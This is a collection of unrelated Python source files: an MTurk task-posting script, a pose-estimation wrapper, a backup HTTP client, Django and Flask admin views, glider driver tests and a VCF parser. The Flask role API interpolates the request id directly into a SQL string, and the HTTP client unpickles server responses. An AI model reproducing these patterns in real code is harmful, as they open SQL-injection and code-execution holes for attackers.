"If you would like to find out more about this project please visit our Open Science Project" \
"at https://osf.io/8bma7/ or consider backing our project on " \
"Experiment: https://experiment.com/projects/crowdsourcing-the-analysis-of-sleep-can-the-public-be-sleep-scientists"
keywords = ["sleep", "scoring", "spindles", "spindle", "brainwaves", "MODA", "psych", "annotation"]
frame_height = 800 # the height of the iframe holding the external hit
questionform = boto.mturk.question.ExternalQuestion(url + '?currentPhase=phase1', frame_height)
quals = Qualifications()
quals.add(Requirement('000000000000000000L0', 'GreaterThanOrEqualTo', '95')) #'Worker_PercentHITsApproved'
quals.add(Requirement(phasesQualID[host]['practice'], 'Exists'))
quals.add(Requirement(phasesQualID[host]['phase1'], 'DoesNotExist'))
if host != 'sandbox':
if testing:
quals.add(Requirement(testingQual, 'Exists'))
else:
quals.add(Requirement('00000000000000000040', 'GreaterThanOrEqualTo', '100')) #'Worker_NumberHITsApproved'
# quals.add(LocaleRequirement('In', ['US','IN'])) #locale
# quals.add(LocaleRequirement('EqualTo', 'IN')) #locale
i = 0
for i in range(1, num_hits+1):
create_hit_result = self.mturk.create_hit(
title=title,
description=description,
keywords=keywords,
question=questionform,
reward=boto.mturk.price.Price(amount=amount),
lifetime=datetime.timedelta(4),
duration=datetime.timedelta(minutes=30),
qualifications=quals,
response_groups=('Minimal', 'HITDetail'), # I don't know what response groups are
)
print('Posted ' + str(i) + ' further HITS @ $' + str(amount))
mtt = MturkTools()
#mtt.post_prac_hits(100, 0.20)
#mtt.post_futher_hits(100, 0.13)
# mtt.expire_remaining_hits()
# mtt.save_mturk_data()
mtt.get_all_user_data_from_aws()
mtt.parse_aws_to_csv()
#mtt.approve_hits()
#mtt.remove_qualifications('practice')
# mtt.mturk.notify_workers('AR72L0JX4D03W',
# 'Spindle Detection on MODA',
# 'Hi There!,'
# 'Thanks for completing spindle detection HITs. '
# 'Unfortunately the data for your HITs is missing. '
# 'This is most likely an error with the spindle detection program. '
# 'Can you help me debug this by replying with your operating system, browser type and version'
# 'and if you saw any strange behaviour in the spindle detection program.')
|
<reponame>galvinw/fairmotdocker<gh_stars>0
import glob
import numpy as np
import torchvision
import torch
from PIL import Image, ImageFile
from openpifpaf.network import nets
from openpifpaf import decoder
from .process import image_transform
class ImageList(torch.utils.data.Dataset):
"""It defines transformations to apply to images and outputs of the dataloader"""
def __init__(self, image_paths, scale):
self.image_paths = image_paths
self.scale = scale
def __getitem__(self, index):
image_path = self.image_paths[index]
ImageFile.LOAD_TRUNCATED_IMAGES = True
with open(image_path, 'rb') as f:
image = Image.open(f).convert('RGB')
if self.scale > 1.01 or self.scale < 0.99:
image = torchvision.transforms.functional.resize(image,
(round(self.scale * image.size[1]),
round(self.scale * image.size[0])),
interpolation=Image.BICUBIC)
# PIL images are not iterables
original_image = torchvision.transforms.functional.to_tensor(image) # 0-255 --> 0-1
image = image_transform(image)
return image_path, original_image, image
def __len__(self):
return len(self.image_paths)
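# Minimal usage sketch (the image paths are placeholders): ImageList plugs
# into a standard torch DataLoader for batched preprocessing.
#
#   dataset = ImageList(['frame_000.png', 'frame_001.png'], scale=1.0)
#   loader = torch.utils.data.DataLoader(dataset, batch_size=1, num_workers=2)
#   for image_paths, original_images, images in loader:
#       ...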
def factory_from_args(args):
# Merge the model_pifpaf argument
# if not args.checkpoint:
args.checkpoint = 'resnet152' # Default model Resnet 152
# glob
args.webcam = True
if not args.webcam:
if args.glob:
args.images += glob.glob(args.glob)
if not args.images:
raise Exception("no image files given")
# add args.device
args.device = torch.device('cpu')
args.pin_memory = False
if torch.cuda.is_available():
args.device = torch.device('cuda')
args.pin_memory = True
# Add num_workers
args.loader_workers = 8
# Add visualization defaults
args.figure_width = 10
args.dpi_factor = 1.0
return args
class PifPaf:
def __init__(self, args):
"""Instanciate the mdodel"""
factory_from_args(args)
model_pifpaf, _ = nets.factory_from_args(args)
model_pifpaf = model_pifpaf.to(args.device)
self.processor = decoder.factory_from_args(args, model_pifpaf)
self.keypoints_whole = []
# Scale the keypoints to the original image size for printing (if not webcam)
if not args.webcam:
self.scale_np = np.array([args.scale, args.scale, 1] * 17).reshape(17, 3)
else:
self.scale_np = np.array([1, 1, 1] * 17).reshape(17, 3)
def fields(self, processed_images):
"""Encoder for pif and paf fields"""
fields_batch = self.processor.fields(processed_images)
return fields_batch
def forward(self, image, processed_image_cpu, fields):
"""Decoder, from pif and paf fields to keypoints"""
self.processor.set_cpu_image(image, processed_image_cpu)
keypoint_sets, scores = self.processor.keypoint_sets(fields)
if keypoint_sets.size > 0:
self.keypoints_whole.append(np.around((keypoint_sets / self.scale_np), 1)
.reshape(keypoint_sets.shape[0], -1).tolist())
pifpaf_out = [
{'keypoints': np.around(kps / self.scale_np, 1).reshape(-1).tolist(),
'bbox': [np.min(kps[:, 0]) / self.scale_np[0, 0], np.min(kps[:, 1]) / self.scale_np[0, 0],
np.max(kps[:, 0]) / self.scale_np[0, 0], np.max(kps[:, 1]) / self.scale_np[0, 0]]}
for kps in keypoint_sets
]
return keypoint_sets, scores, pifpaf_out
|
# -*- coding: utf-8 -*-
"""
HTTP client for the backup and other modules.
"""
import pickle
from datetime import datetime
from pathlib import Path
import requests
from src.utils_v1.flask_rangerequest import RangeRequest
from src.utils.file_manager import fm
from src.utils.http_exception import InvalidParameterException, FileNotFoundException
class HttpClient:
def __init__(self):
self.timeout = 30
def _check_status_code(self, r, expect_code):
if r.status_code != expect_code:
raise InvalidParameterException(msg=f'[HttpClient] Failed to {r.request.method} ({r.request.url}) '
f'with status code: {r.status_code}, {r.text}')
def _raise_http_exception(self, url, method, e):
raise InvalidParameterException(msg=f'[HttpClient] Failed to {method} ({url}) with exception: {str(e)}')
def get(self, url, access_token, is_body=True, **kwargs):
try:
headers = {"Content-Type": "application/json", "Authorization": "token " + access_token}
r = requests.get(url, headers=headers, timeout=self.timeout, **kwargs)
self._check_status_code(r, 200)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'GET', e)
def get_to_file(self, url, access_token, file_path: Path):
r = self.get(url, access_token, is_body=False, stream=True)
fm.write_file_by_response(r, file_path, is_temp=True)
def post(self, url, access_token, body, is_json=True, is_body=True, success_code=201, **kwargs):
try:
headers = dict()
if access_token:
headers["Authorization"] = "token " + access_token
if is_json:
headers['Content-Type'] = 'application/json'
r = requests.post(url, headers=headers, json=body, timeout=self.timeout, **kwargs) \
if is_json else requests.post(url, headers=headers, data=body, timeout=self.timeout, **kwargs)
self._check_status_code(r, success_code)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'POST', e)
def post_file(self, url, access_token, file_path: str):
with open(file_path, 'rb') as f:
self.post(url, access_token, body=f, is_json=False, is_body=False)
def post_to_file(self, url, access_token, file_path: Path, body=None, is_temp=False):
r = self.post(url, access_token, body, is_json=False, is_body=False, stream=True)
fm.write_file_by_response(r, file_path, is_temp)
def post_to_pickle_data(self, url, access_token, body=None):
r = self.post(url, access_token, body, is_json=False, is_body=False, stream=True)
return pickle.loads(r.content)
def put(self, url, access_token, body, is_body=False):
try:
headers = {"Authorization": "token " + access_token}
r = requests.put(url, headers=headers, data=body, timeout=self.timeout)
self._check_status_code(r, 200)
return r.json() if is_body else r
except Exception as e:
self._raise_http_exception(url, 'PUT', e)
def put_file(self, url, access_token, file_path: Path):
with open(file_path.as_posix(), 'br') as f:
self.put(url, access_token, f, is_body=False)
def delete(self, url, access_token):
try:
headers = {"Authorization": "token " + access_token}
r = requests.delete(url, headers=headers, timeout=self.timeout)
self._check_status_code(r, 204)
except Exception as e:
self._raise_http_exception(url, 'DELETE', e)
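# Minimal usage sketch (the URL and token below are placeholders, not real
# endpoints of this service):
#
#   client = HttpClient()
#   body = client.get('https://vault.example.com/api/v1/files', access_token='<token>')
#   client.get_to_file('https://vault.example.com/api/v1/backup', '<token>', Path('backup.bin'))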
class HttpServer:
def __init__(self):
pass
def create_range_request(self, file_path: Path):
if not file_path.exists() or not file_path.is_file():
raise FileNotFoundException(msg='Failed to get file for creating range request object.')
with open(file_path.as_posix(), 'rb') as f:
etag = RangeRequest.make_etag(f)
return RangeRequest(open(file_path.as_posix(), 'rb'),
etag=etag,
last_modified=datetime.utcnow(),
size=file_path.stat().st_size).make_response()
|
"""Volume Views"""
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.mixins import \
PermissionRequiredMixin as DjangoPermissionRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.shortcuts import reverse
from django.utils.translation import gettext as _
from django.views.generic import DeleteView, DetailView, ListView, UpdateView
from guardian.mixins import PermissionListMixin, PermissionRequiredMixin
from guardian.shortcuts import get_objects_for_user
from p2.core.forms import VolumeForm
from p2.core.models import Component, Volume
from p2.lib.reflection import class_to_path
from p2.lib.reflection.manager import ControllerManager
from p2.lib.views import CreateAssignPermView
COMPONENT_MANAGER = ControllerManager('component.controllers')
class VolumeListView(PermissionListMixin, LoginRequiredMixin, ListView):
"""List all volumes a user can use"""
model = Volume
permission_required = 'p2_core.view_volume'
ordering = 'name'
paginate_by = 10
class VolumeDetailView(PermissionRequiredMixin, DetailView):
"""Show volume overview and all components activated/available"""
model = Volume
permission_required = 'p2_core.view_volume'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
components = []
existing_components = get_objects_for_user(self.request.user, 'p2_core.view_component')
for controller in COMPONENT_MANAGER.list():
controller_path = class_to_path(controller)
# Check if a component for this volume is configured
existing_component = existing_components.filter(
controller_path=controller_path,
volume=self.object)
if existing_component.exists():
components.append(existing_component.first())
else:
# Create an in-memory Object with the controller_path assigned
_component = Component()
_component.controller_path = controller_path
_component.volume = self.object
# Set an extra attribute so the template can reflect it
_component.configured = False
_component.enabled = False
components.append(_component)
context['components'] = components
return context
class VolumeCreateView(SuccessMessageMixin, DjangoPermissionRequiredMixin, CreateAssignPermView):
"""Create new volume"""
model = Volume
form_class = VolumeForm
permission_required = 'p2_core.add_volume'
template_name = 'generic/form.html'
success_message = _('Successfully created Volume')
permissions = [
'p2_core.view_volume',
'p2_core.use_volume',
'p2_core.change_volume',
'p2_core.delete_volume',
]
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
class VolumeUpdateView(SuccessMessageMixin, PermissionRequiredMixin, UpdateView):
"""Update existing volume"""
model = Volume
form_class = VolumeForm
permission_required = 'p2_core.change_volume'
template_name = 'generic/form.html'
success_message = _('Successfully updated Volume')
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
class VolumeDeleteView(SuccessMessageMixin, PermissionRequiredMixin, DeleteView):
"""Delete volume"""
model = Volume
permission_required = 'p2_core.delete_volume'
template_name = 'generic/delete.html'
success_message = _('Successfully deleted Volume')
def get_success_url(self):
return reverse('p2_ui:core-volume-list')
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.__dict__)
return super().delete(request, *args, **kwargs)
|
<reponame>xuannanxan/maitul-manage
from flask_restful import Resource,reqparse,fields,marshal,abort
from app.apis.api_constant import *
from app.models import Role,RoleRule, Crud
from app.utils import object_to_json,mysql_to_json
from app.apis.admin.common import login_required,permission_required
from app.utils.api_doc import Apidoc
from app.api_docs.admin import role_doc as doc
from flask import g
from app.config import PAGINATE_NUM
import json
api = Apidoc('系统-角色管理')
# Single-record operations
parse_id = reqparse.RequestParser()
parse_id.add_argument('id',type=str)
parse_base = parse_id.copy()
parse_base.add_argument('name',type=str,required=True,help='请输入名称')
parse_base.add_argument('info',type=str)
parse_rules = parse_id.copy()
parse_rules.add_argument('rules',type=str,required=True,help='请配置权限')
_fields = {
'name':fields.String,
'info':fields.String,
'id':fields.String,
}
sing_fields = {
'status':fields.Integer,
'msg':fields.String,
'data':fields.Nested(_fields)
}
def getSingData(id):
data = Role.query.filter_by(id = id , is_del = '0').first()
if not data :
abort(RET.NotFound,msg='角色不存在')
return data
class RoleAuthResource(Resource):
@api.doc(api_doc=doc.auth)
@login_required
@permission_required
def post(self):
'''
Assign permission rules to a role
'''
args = parse_rules.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
rules = json.loads(args.get('rules'))
# Clear the existing rules
old_data = RoleRule.query.filter_by(role_id = id ).all()
if old_data :
Crud.clean_all(old_data)
# If no permission points were given, return after clearing
if not rules:
return {
'status':RET.OK,
'msg':'权限设置成功'
}
# Add the new permissions
relation_data = [RoleRule(
role_id = sing_data.id,
rule_id =v
) for v in rules ]
if Crud.add_all(relation_data):
sing_data.last_editor = g.admin.username
sing_data.updata()
return {
'status':RET.OK,
'msg':'权限设置成功'
}
abort(RET.BadRequest,msg='权限设置失败,请重试...')
class RoleResource(Resource):
@api.doc(api_doc=doc.add)
@login_required
@permission_required
def post(self):
'''
Add a new role
'''
args = parse_base.parse_args()
name = args.get('name')
info = args.get('info')
_data = Role.query.filter_by(name = name,is_del = '0').first()
if _data:
abort(RET.Forbidden,msg='当前角色已存在')
model_data = Role()
model_data.name = name
model_data.info = info
model_data.last_editor = g.admin.username
if model_data.add():
data = {
'status':RET.Created,
'msg':'添加成功',
'data':model_data
}
return marshal(data,sing_fields)
abort(RET.BadRequest,msg='添加失败,请重试')
@api.doc(api_doc=doc.put)
@login_required
@permission_required
def put(self):
'''
Update an existing role
'''
args = parse_base.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
name = args.get('name')
info = args.get('info')
# If the name already exists under a different ID
_data = Role.query.filter(Role.id != id , Role.is_del == '0',Role.name == name).first()
if _data:
abort(RET.Forbidden,msg='角色已存在')
sing_data.name = name
sing_data.info = info
sing_data.last_editor = g.admin.username
result = sing_data.updata()
if result:
data = {
'status':RET.OK,
'msg':'修改成功',
'data':sing_data
}
return marshal(data,sing_fields)
abort(RET.BadRequest,msg='修改失败,请重试')
@api.doc(api_doc=doc.lst)
@login_required
@permission_required
def get(self):
'''
Fetch data: returns a single record when an ID is given, otherwise all records
'''
args_id = parse_id.parse_args()
id = args_id.get('id')
if id:
sql = '''
SELECT j.*,GROUP_CONCAT(r.rule_id SEPARATOR ',') as rules
FROM role as j
left join role_rule as r on j.id = r.role_id
WHERE j.is_del = 0 AND j.id = %s
'''%id
sql_data = Crud.auto_select(sql)
first_data = sql_data.first()
if not first_data:
abort(RET.NotFound,msg='角色不存在')
return {
'status':RET.OK,
'data':mysql_to_json(dict(first_data))
}
_list = Role.query.filter_by(is_del = '0').all()
if not _list:
abort(RET.BadRequest,msg='暂无数据')
data = {
'status':RET.OK,
'data':[object_to_json(v) for v in _list]
}
return data
@api.doc(api_doc=doc.delete)
@login_required
@permission_required
def delete(self):
'''
Delete a role
'''
args = parse_id.parse_args()
id = args.get('id')
if not id:
abort(RET.BadRequest,msg='请勿非法操作')
sing_data = getSingData(id)
sing_data.last_editor = g.admin.username
result = sing_data.delete()
# Clear the existing authorizations
_auth = RoleRule.query.filter_by(role_id = id ).all()
if _auth :
Crud.clean_all(_auth)
if result:
return {
'status':RET.OK,
'msg':'删除成功'
}
abort(RET.BadRequest,msg='删除失败,请重试')
|
<filename>mi/dataset/driver/moas/gl/parad/test/test_driver.py
"""
@package mi.dataset.driver.moas.gl.parad.test.test_driver
@file marine-integrations/mi/dataset/driver/moas/gl/parad/test/test_driver.py
@author <NAME>
@brief Test cases for glider parad data
USAGE:
Make tests verbose and provide stdout
* From the IDK
$ bin/dsa/test_driver
$ bin/dsa/test_driver -i [-t testname]
$ bin/dsa/test_driver -q [-t testname]
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
import unittest
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from exceptions import Exception
from mi.idk.dataset.unit_test import DataSetTestCase
from mi.idk.dataset.unit_test import DataSetIntegrationTestCase
from mi.idk.dataset.unit_test import DataSetQualificationTestCase
from mi.idk.exceptions import SampleTimeout
from mi.dataset.dataset_driver import DataSourceConfigKey, DataSetDriverConfigKeys
from mi.dataset.dataset_driver import DriverParameter
from mi.dataset.driver.moas.gl.parad.driver import PARADDataSetDriver
from mi.dataset.parser.glider import ParadTelemeteredDataParticle
from pyon.agent.agent import ResourceAgentState
from interface.objects import ResourceAgentErrorEvent
DataSetTestCase.initialize(
driver_module='mi.dataset.driver.moas.gl.parad.driver',
driver_class="PARADDataSetDriver",
agent_resource_id = '123xyz',
agent_name = 'Agent007',
agent_packet_config = PARADDataSetDriver.stream_config(),
startup_config = {
DataSourceConfigKey.HARVESTER:
{
DataSetDriverConfigKeys.DIRECTORY: '/tmp/paradtest',
DataSetDriverConfigKeys.STORAGE_DIRECTORY: '/tmp/stored_paradtest',
DataSetDriverConfigKeys.PATTERN: '*.mrg',
DataSetDriverConfigKeys.FREQUENCY: 1,
},
DataSourceConfigKey.PARSER: {}
}
)
SAMPLE_STREAM = 'parad_m_glider_instrument'
###############################################################################
# UNIT TESTS #
# Device specific unit tests are for #
# testing device specific capabilities #
###############################################################################
@attr('INT', group='mi')
class IntegrationTest(DataSetIntegrationTestCase):
def test_get(self):
"""
Test that we can get data from files. Verify that the driver sampling
can be started and stopped.
"""
self.clear_sample_data()
# Start sampling and watch for an exception
self.driver.start_sampling()
self.clear_async_data()
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
# Results file, Number of Particles (rows) expected to compare, timeout
self.assert_data(ParadTelemeteredDataParticle, 'single_parad_record.mrg.result.yml', count=1, timeout=10)
self.clear_async_data()
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Results file, Number of Particles (rows) expected to compare, timeout
self.assert_data(ParadTelemeteredDataParticle, 'multiple_parad_record.mrg.result.yml', count=4, timeout=10)
log.debug("IntegrationTest.test_get(): Start second file ingestion")
self.clear_async_data()
self.create_sample_data('unit_247_2012_051_0_0-sciDataOnly.mrg', "CopyOf-unit_247_2012_051_0_0-sciDataOnly.mrg")
self.assert_data(ParadTelemeteredDataParticle, count=115, timeout=30)
def test_stop_resume(self):
"""
Test the ability to stop and restart the process
"""
path_1 = self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
path_2 = self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Create and store the new driver state
state = {
'CopyOf-single_glider_record.mrg': self.get_file_state(path_1, True, 1160),
'CopyOf-multiple_glider_record.mrg': self.get_file_state(path_2, False, 10537)
}
self.driver = self._get_driver_object(memento=state)
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
# verify data is produced
self.assert_data(ParadTelemeteredDataParticle, 'merged_parad_record.mrg.result.yml', count=3, timeout=10)
def test_stop_start_ingest(self):
"""
Test the ability to stop and restart sampling, and ingesting files in the correct order
"""
# create some data to parse
self.clear_async_data()
self.driver.start_sampling()
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.create_sample_data('multiple_glider_record.mrg', "xCopyOf-multiple_glider_record.mrg")
self.assert_data(ParadTelemeteredDataParticle, 'single_parad_record.mrg.result.yml', count=1, timeout=10)
self.assert_file_ingested("CopyOf-single_glider_record.mrg")
self.assert_file_not_ingested("xCopyOf-multiple_glider_record.mrg")
self.driver.stop_sampling()
self.driver.start_sampling()
self.assert_data(ParadTelemeteredDataParticle, 'multiple_parad_record.mrg.result.yml', count=4, timeout=10)
self.assert_file_ingested("xCopyOf-multiple_glider_record.mrg")
def test_bad_sample(self):
"""
Test a bad sample. To do this we set a state to the middle of a record
"""
# create some data to parse
self.clear_async_data()
path = self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Create and store the new driver state
state = {
'CopyOf-multiple_glider_record.mrg': self.get_file_state(path, False, 12167),
}
self.driver = self._get_driver_object(memento=state)
self.driver.start_sampling()
# verify data is produced
self.assert_data(ParadTelemeteredDataParticle, 'bad_sample_parad_record.mrg.result.yml', count=1, timeout=10)
self.assert_file_ingested("CopyOf-multiple_glider_record.mrg")
def test_sample_exception(self):
"""
test that a file is marked as parsed if it has a sample exception (which will happen with an empty file)
"""
self.clear_async_data()
config = self._driver_config()['startup_config']['harvester']['pattern']
filename = config.replace("*", "foo")
self.create_sample_data(filename)
# Start sampling and watch for an exception
self.driver.start_sampling()
# an event catches the sample exception
self.assert_event('ResourceAgentErrorEvent')
self.assert_file_ingested(filename)
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for #
# testing device specific capabilities #
###############################################################################
@attr('QUAL', group='mi')
class QualificationTest(DataSetQualificationTestCase):
def setUp(self):
super(QualificationTest, self).setUp()
def test_publish_path(self):
"""
Setup an agent/driver/harvester/parser and verify that data is
published out the agent
"""
self.create_sample_data('single_glider_record.mrg', 'CopyOf-single_glider_record.mrg')
self.assert_initialize()
# Verify we get one sample
try:
result = self.data_subscribers.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
except Exception as e:
log.error("Exception trapped: %s", e)
self.fail("Sample timeout.")
def test_large_import(self):
"""
There is a bug when activating an instrument: go_active times out, and
there was speculation this was due to blocking behavior in the agent.
https://jira.oceanobservatories.org/tasks/browse/OOIION-1284
"""
self.create_sample_data('unit_247_2012_051_0_0-sciDataOnly.mrg')
self.assert_initialize()
result = self.get_samples(SAMPLE_STREAM, 115, 120)
def test_stop_start(self):
"""
Test the agents ability to start data flowing, stop, then restart
at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
# Verify we get one sample
try:
# Read the first file and verify the data
result = self.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Now read the first three records of the second file then stop
result = self.get_samples(SAMPLE_STREAM, 1)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# Restart sampling and ensure we get the remaining 3 records of the file
self.assert_start_sampling()
result = self.get_samples(SAMPLE_STREAM, 3)
log.debug("got result 2 %s", result)
self.assert_data_values(result, 'merged_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_shutdown_restart(self):
"""
Test the agents ability to completely stop, then restart
at the correct spot.
"""
log.info("CONFIG: %s", self._agent_config())
self.create_sample_data('single_glider_record.mrg', "CopyOf-single_glider_record.mrg")
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Slow down processing to 1 per second to give us time to stop
self.dataset_agent_client.set_resource({DriverParameter.RECORDS_PER_SECOND: 1})
self.assert_start_sampling()
# Verify we get one sample
try:
# Read the first file and verify the data
result = self.get_samples(SAMPLE_STREAM)
log.debug("RESULT: %s", result)
# Verify values
self.assert_data_values(result, 'single_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
self.create_sample_data('multiple_glider_record.mrg', "CopyOf-multiple_glider_record.mrg")
# Now read the first records of the second file then stop
result = self.get_samples(SAMPLE_STREAM, 1)
log.debug("got result 1 %s", result)
self.assert_stop_sampling()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# stop the agent
self.stop_dataset_agent_client()
# re-start the agent
self.init_dataset_agent_client()
#re-initialize
self.assert_initialize(final_state=ResourceAgentState.COMMAND)
# Restart sampling and ensure we get the remaining 3 records of the file
self.assert_start_sampling()
result = self.get_samples(SAMPLE_STREAM, 3)
log.debug("got result 2 %s", result)
self.assert_data_values(result, 'merged_parad_record.mrg.result.yml')
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
except SampleTimeout as e:
log.error("Exception trapped: %s", e, exc_info=True)
self.fail("Sample timeout.")
def test_parser_exception(self):
"""
Test an exception raised after the driver is started during
record parsing.
"""
self.clear_sample_data()
self.create_sample_data('unit_363_2013_245_7_7.mrg')
self.assert_initialize()
self.event_subscribers.clear_events()
self.assert_sample_queue_size(SAMPLE_STREAM, 0)
# Verify an event was raised and we are in our retry state
self.assert_event_received(ResourceAgentErrorEvent, 40)
self.assert_state_change(ResourceAgentState.STREAMING, 10)
|
<filename>vcfpy/parser.py
# -*- coding: utf-8 -*-
"""Parsing of VCF files from ``str``
"""
import ast
import functools
import math
import re
import warnings
from . import header
from . import record
from . import exceptions
from .exceptions import (
CannotConvertValue,
LeadingTrailingSpaceInKey,
UnknownFilter,
UnknownVCFVersion,
SpaceInChromLine,
)
from .compat import OrderedDict
__author__ = "<NAME> <<EMAIL>>"
# expected "#CHROM" header prefix when there are samples
REQUIRE_SAMPLE_HEADER = ("#CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO", "FORMAT")
# expected "#CHROM" header prefix when there are no samples
REQUIRE_NO_SAMPLE_HEADER = ("#CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER", "INFO")
#: Supported VCF versions, a warning will be issued otherwise
SUPPORTED_VCF_VERSIONS = ("VCFv4.0", "VCFv4.1", "VCFv4.2", "VCFv4.3")
class QuotedStringSplitter:
"""Helper class for splitting quoted strings
Has support for interpreting quoted strings but also brackets. Meant
for splitting the VCF header line dicts
"""
#: state constant for normal
NORMAL = 0
#: state constant for quoted
QUOTED = 1
#: state constant for escaped
ESCAPED = 2
#: state constant for array
ARRAY = 3
#: state constant for delimiter
DELIM = 4
def __init__(self, delim=",", quote='"', brackets="[]"):
#: string delimiter
self.delim = delim
#: quote character
self.quote = quote
#: two-character string with opening and closing brackets
assert len(brackets) == 2
self.brackets = brackets
def run(self, s):
"""Split string ``s`` at delimiter, correctly interpreting quotes
Further, interprets arrays wrapped in one level of ``[]``. No
recursive brackets are interpreted (as this would make the grammar
non-regular and currently this complexity is not needed). Currently,
quoting inside of braces is not supported either. This is just to
support the example from VCF v4.3.
"""
begins, ends = [0], []
# transition table
DISPATCH = {
self.NORMAL: self._handle_normal,
self.QUOTED: self._handle_quoted,
self.ARRAY: self._handle_array,
self.DELIM: self._handle_delim,
self.ESCAPED: self._handle_escaped,
}
# run state automaton
state = self.NORMAL
for pos, c in enumerate(s):
state = DISPATCH[state](c, pos, begins, ends)
ends.append(len(s))
assert len(begins) == len(ends)
# Build resulting list
return [s[start:end] for start, end in zip(begins, ends)]
def _handle_normal(self, c, pos, begins, ends): # pylint: disable=W0613
if c == self.delim:
ends.append(pos)
return self.DELIM
elif c == self.quote:
return self.QUOTED
elif c == self.brackets[0]:
return self.ARRAY
else:
return self.NORMAL
def _handle_quoted(self, c, pos, begins, ends): # pylint: disable=W0613
if c == "\\":
return self.ESCAPED
elif c == self.quote:
return self.NORMAL
else:
return self.QUOTED
def _handle_array(self, c, pos, begins, ends): # pylint: disable=W0613
if c == self.brackets[1]:
return self.NORMAL
else:
return self.ARRAY
def _handle_delim(self, c, pos, begins, ends): # pylint: disable=W0613
begins.append(pos)
return self.NORMAL
def _handle_escaped(self, c, pos, begins, ends): # pylint: disable=W0613
return self.QUOTED
def split_quoted_string(s, delim=",", quote='"', brackets="[]"):
return QuotedStringSplitter(delim, quote, brackets).run(s)
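# Sketch of the expected behaviour (assumed example input): commas inside
# quotes or brackets do not split.
#
#   split_quoted_string('ID=1,Desc="a,b",Arr=[x,y]')
#   -> ['ID=1', 'Desc="a,b"', 'Arr=[x,y]']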
def split_mapping(pair_str):
"""Split the ``str`` in ``pair_str`` at ``'='``
Warn if key needs to be stripped
"""
orig_key, value = pair_str.split("=", 1)
key = orig_key.strip()
if key != orig_key:
warnings.warn(
"Mapping key {} has leading or trailing space".format(repr(orig_key)),
LeadingTrailingSpaceInKey,
)
return key, value
def parse_mapping(value):
"""Parse the given VCF header line mapping
Such a mapping consists of "key=value" pairs, separated by commas and
wrapped into angular brackets ("<...>"). Strings are usually quoted,
for certain known keys, exceptions are made, depending on the tag key.
This, however, only becomes important when serializing.
:raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` if
there was a problem parsing the file
"""
if not value.startswith("<") or not value.endswith(">"):
raise exceptions.InvalidHeaderException(
"Header mapping value was not wrapped in angular brackets"
)
# split the comma-separated list into pairs, ignoring commas in quotes
pairs = split_quoted_string(value[1:-1], delim=",", quote='"')
# split these pairs into key/value pairs, converting flags to mappings
# to True
key_values = []
for pair in pairs:
if "=" in pair:
key, value = split_mapping(pair)
if value.startswith('"') and value.endswith('"'):
value = ast.literal_eval(value)
elif value.startswith("[") and value.endswith("]"):
value = [v.strip() for v in value[1:-1].split(",")]
else:
key, value = pair, True
key_values.append((key, value))
# return completely parsed mapping as OrderedDict
return OrderedDict(key_values)
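# Illustrative example (assumed input, following the VCF header syntax):
#
#   parse_mapping('<ID=DP,Number=1,Type=Integer,Description="Total Depth">')
#   -> OrderedDict([('ID', 'DP'), ('Number', '1'), ('Type', 'Integer'),
#                   ('Description', 'Total Depth')])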
class HeaderLineParserBase:
"""Parse into appropriate HeaderLine"""
def parse_key_value(self, key, value):
"""Parse the key/value pair
:param str key: the key to use in parsing
:param str value: the value to parse
:returns: :py:class:`vcfpy.header.HeaderLine` object
"""
raise NotImplementedError("Must be overridden")
class StupidHeaderLineParser(HeaderLineParserBase):
"""Parse into HeaderLine (no particular structure)"""
def parse_key_value(self, key, value):
return header.HeaderLine(key, value)
class MappingHeaderLineParser(HeaderLineParserBase):
"""Parse into HeaderLine (no particular structure)"""
def __init__(self, line_class):
"""Initialize the parser"""
#: the class to use for the VCF header line
self.line_class = line_class
